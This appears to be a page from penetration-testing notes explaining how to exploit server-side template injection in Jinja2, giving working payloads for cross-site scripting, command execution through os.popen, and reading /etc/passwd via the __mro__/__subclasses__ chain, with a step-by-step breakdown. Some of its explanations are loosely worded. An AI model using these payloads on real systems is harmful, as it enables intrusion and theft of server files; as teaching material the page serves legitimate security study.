Exploitation

Exploiting the SSTI

You can exploit SSTI in the following way:

Cross Site Scripting

{{ "<script>alert('XSS')</script>" }}

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo \"<script>alert(1)</script>\"').read() }}

Remote Code Execution

In this example we will focus on the exploiting SSTI in order to gain code execution in the Jinja2 templating engine (Python).

One of the exploits that can enable us to perform code execution can be found below:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

it looks a little bit complicated but everything should become clear after the quick explaination of the code above.

'' # creates the empty string variable

.__class__ # returns the class that the string belongs in (<class 'str'>)

Once the class is returned the payload uses MRO attribute (Method Resolution Order) which are classes that python search for base classes during method resolution (related to class inheritance).

.__mro__ # listing the classes

.__mro__[2] 
# accessing the classes that are on the top of hierarchy to find as many
# useful classes as we can
# in our case it is <class 'object'>

When we have useful class that we can take advantage of we can proceed to choosing the useful subclasses:

.__subclasses__ # shows classes that use choosen class (in our case: <class 'object'>)

.__subclasses__[40] 
# in our case it is <class 'wrapper_descriptor'> 
# which includes <type 'file'> function which can be used to read files on the system

Running the useful function which results in reading the /etc/passwd file:

('/etc/passwd').read()

PreviousCode Review NextAuthentication Bypass

Last updated 10 months ago

hashtagExploiting the SSTI

hashtagCross Site Scripting

hashtagRemote Code Execution

Exploiting the SSTI

Cross Site Scripting

Remote Code Execution